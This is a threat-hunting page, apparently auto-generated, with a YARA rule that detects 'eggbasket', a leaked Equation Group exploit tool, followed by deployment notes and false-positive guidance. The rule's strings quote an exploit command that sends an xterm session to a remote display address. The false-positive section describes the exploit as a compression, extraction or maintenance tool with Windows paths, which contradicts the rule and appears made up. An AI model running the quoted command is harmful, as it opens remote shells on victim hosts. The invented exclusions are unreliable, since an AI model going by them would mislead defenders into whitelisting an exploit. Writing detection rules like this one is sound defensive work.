Equation Group hack tool leaked by ShadowBrokers- file eggbasket

Hunt Hypothesis

The hunt hypothesis detects potential adversary use of the Equation Group hack tool, eggbasket, which may indicate advanced persistent threat activity. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential compromise from sophisticated, previously unknown malware.

YARA Rule

rule EquationGroup_eggbasket {
   meta:
      description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
      author = "Florian Roth"
      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
      date = "2017-04-08"
      hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
   strings:
      $x1 = "# Building Shellcode into exploit." fullword ascii
      $x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\"  -d 10.0.0.1 -p 80" fullword ascii
      $x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
   condition:
      ( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
}

Deployment Notes

This YARA rule can be deployed in the following contexts:

• Microsoft Defender for Endpoint — Custom indicators / advanced hunting
• Email Gateway — Attachment scanning
• File Share Monitoring — Periodic scanning of shared drives
• YARA CLI — Manual threat hunting on endpoints

This rule contains 3 string patterns in its detection logic.

References

• https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
• Source Rule

False Positive Guidance

• Scenario: Legitimate Use of eggbasket by Red Team or Penetration Testers
  Description: Security teams may use the eggbasket tool during red team exercises or penetration testing to simulate Equation Group attack vectors.
  Filter/Exclusion: Check for presence of a known red team toolset or use of the tool within a sandboxed environment or during authorized security assessments.

• Scenario: Scheduled System Maintenance Task Using eggbasket
  Description: An enterprise may have a scheduled job that uses eggbasket as part of a maintenance script, such as for log parsing or data extraction.
  Filter/Exclusion: Filter based on the process owner (e.g., SYSTEM, LocalService) or check for presence of a known legitimate script path (e.g., C:\Windows\System32\).

• Scenario: Malicious File Analysis Using eggbasket
  Description: Security analysts may run eggbasket to analyze a suspicious file in a controlled environment to determine its behavior.
  Filter/Exclusion: Check for execution within a sandboxed environment or virtual machine, or presence of a known analysis tool (e.g., Procmon, Wireshark, Volatility).

• Scenario: Legitimate File Compression Tool with Similar Name
  Description: A third-party file compression tool with a similar name to eggbasket may be used in the enterprise for data management tasks.
  Filter/Exclusion: Check for file signature or hash matches against known legitimate compression tools (e.g., 7-Zip, WinRAR).

• Scenario: Administrative Task Involving File Extraction
  Description: System administrators may use eggbasket to extract files from a compressed archive as part of routine maintenance or backup processes.
  **Filter/Ex